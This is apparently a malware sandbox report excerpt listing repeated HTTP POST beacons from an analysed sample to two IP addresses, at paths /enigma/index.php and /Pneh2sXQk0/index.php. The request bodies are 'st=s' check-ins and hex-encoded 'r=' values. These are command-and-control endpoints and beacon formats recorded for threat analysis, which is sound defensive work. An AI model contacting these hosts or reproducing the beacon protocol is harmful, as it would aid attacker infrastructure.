                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
